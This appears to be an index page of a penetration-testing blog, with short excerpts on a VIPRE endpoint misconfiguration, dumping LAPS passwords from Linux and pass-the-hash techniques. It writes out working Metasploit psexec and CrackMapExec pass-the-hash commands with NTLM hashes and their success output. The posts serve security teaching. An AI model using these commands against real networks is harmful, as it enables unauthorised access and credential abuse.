This post documents a security mis-configuation I observed in VIPRE Endpoint Security with Endpoint Discovery. A few years ago, I published a blog post titled The Dangers of Client Probing on Palo Alto Firewalls, which detailed how client probing feature on Palo Alto firewalls can leak service account password hashes. This issue is very similar…
Dumping LAPS Passwords from Linux
Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux. I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host,…
Alternative ways to Pass the Hash (PtH)
Do you remember the first time you passed the hash? It probably went a little something like this:
|
1 2 3 4 5 6 |
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) |
If you are unfamiliar, that is the Metasploit PSexec module being used. Well, nowadays we don’t really do that anymore. You probably pass the hash something like this:
|
1 2 3 |
cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local SMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True) SMB 10.0.0.20 445 PC01 [+] domain.local\user BD1C6503987F8FF006296118F359FA79 (Pwn3d!) |
That is CrackMapExec being used to pass…
Categories
n00py Blog- Practical Attacks against NTLMv1
- Password Spraying RapidIdentity Logon Portal
- Manipulating User Passwords Without Mimikatz
- Unauthenticated Dumping of Usernames via Cisco Unified Call Manager (CUCM)
- Adding DCSync Permissions from Linux
- Resetting an Expired Password Remotely
- Dumping Plaintext RDP credentials from svchost.exe
- The Dangers of Endpoint Discovery in VIPRE Endpoint Security
- Dumping LAPS Passwords from Linux
- Alternative ways to Pass the Hash (PtH)
Archives
- October 2022
- March 2022
- January 2022
- September 2021
- May 2021
- December 2020
- August 2020
- May 2020
- February 2020
- January 2020
- December 2019
- June 2019
- March 2019
- October 2018
- August 2018
- June 2018
- April 2018
- March 2018
- January 2018
- December 2017
- November 2017
- October 2017
- September 2017
- August 2017
- June 2017
- April 2017
- March 2017
- January 2017
- October 2016